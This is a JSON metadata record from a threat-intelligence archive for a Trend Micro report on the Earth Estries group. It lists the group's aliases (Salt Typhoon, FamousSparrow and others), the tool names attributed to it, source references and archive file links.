One customers with Threat Insights Entitlement enabled.\r\nIndicators of Compromise\r\nThe indicators of compromise can be found here.\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html\r\nhttps://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html\r\nPage 19 of 19", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "origins": [ "web" ], "references": [ "https://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html" ], "report_names": [ "breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html" ], "threat_actors": [ { "id": "f67fb5b3-b0d4-484c-943e-ebf12251eff6", "created_at": "2022-10-25T16:07:23.605611Z", "updated_at": "2026-04-10T02:00:04.685162Z", "deleted_at": null, "main_name": "FamousSparrow", "aliases": [ "Earth Estries" ], "source_name": "ETDA:FamousSparrow", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "f0eca237-f191-448f-87d1-5d6b3651cbff", "created_at": "2024-02-06T02:00:04.140087Z", "updated_at": "2026-04-10T02:00:03.577326Z", "deleted_at": null, "main_name": "GhostEmperor", "aliases": [ "OPERATOR PANDA", "FamousSparrow", "UNC2286", "Salt Typhoon", "RedMike" ], "source_name": "MISPGALAXY:GhostEmperor", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a09ade2a-6b87-4f9a-b4f8-23cf14f63633", "created_at": "2023-11-04T02:00:07.676869Z", "updated_at": "2026-04-10T02:00:03.389898Z", "deleted_at": null, "main_name": "Earth Estries", "aliases": [], "source_name": "MISPGALAXY:Earth Estries", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d390d62a-6e11-46e5-a16f-a88898a8e6ff", "created_at": "2024-12-28T02:01:54.899899Z", "updated_at": "2026-04-10T02:00:04.880446Z", "deleted_at": null, "main_name": "Salt Typhoon", "aliases": [ "Earth Estries", "FamousSparrow", "GhostEmperor", "Operator Panda", "RedMike", "Salt Typhoon", "UNC2286" ], "source_name": "ETDA:Salt Typhoon", "tools": [ "Agentemis", "Backdr-NQ", "Cobalt Strike", "CobaltStrike", "Crowdoor", "Cryptmerlin", "Deed RAT", "Demodex", "FamousSparrow", "FuxosDoor", "GHOSTSPIDER", "HemiGate", "MASOL RAT", "Mimikatz", "NBTscan", "NinjaCopy", "ProcDump", "PsExec", "PsList", "SnappyBee", "SparrowDoor", "TrillClient", "WinRAR", "Zingdoor", "certutil", "certutil.exe", "cobeacon", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "fcff864b-9255-49cf-9d9b-2b9cb2ad7cff", "created_at": "2025-04-23T02:00:55.190165Z", "updated_at": "2026-04-10T02:00:05.361244Z", "deleted_at": null, "main_name": "Salt Typhoon", "aliases": [ "Salt Typhoon" ], "source_name": "MITRE:Salt Typhoon", "tools": [ "JumbledPath" ], "source_id": "MITRE", "reports": null }, { "id": "6477a057-a76b-4b60-9135-b21ee075ca40", "created_at": "2025-11-01T02:04:53.060656Z", "updated_at": "2026-04-10T02:00:03.845594Z", "deleted_at": null, "main_name": "BRONZE TIGER", "aliases": [ "Earth Estries ", "Famous Sparrow ", "Ghost Emperor ", "RedMike ", "Salt Typhoon " ], "source_name": "Secureworks:BRONZE TIGER", "tools": [], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434083, "ts_updated_at": 1775826730, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/3fc2dc15d67583665a9daf7cc36f246b4864d052.pdf", "text": "https://archive.orkl.eu/3fc2dc15d67583665a9daf7cc36f246b4864d052.txt", "img": "https://archive.orkl.eu/3fc2dc15d67583665a9daf7cc36f246b4864d052.jpg" } }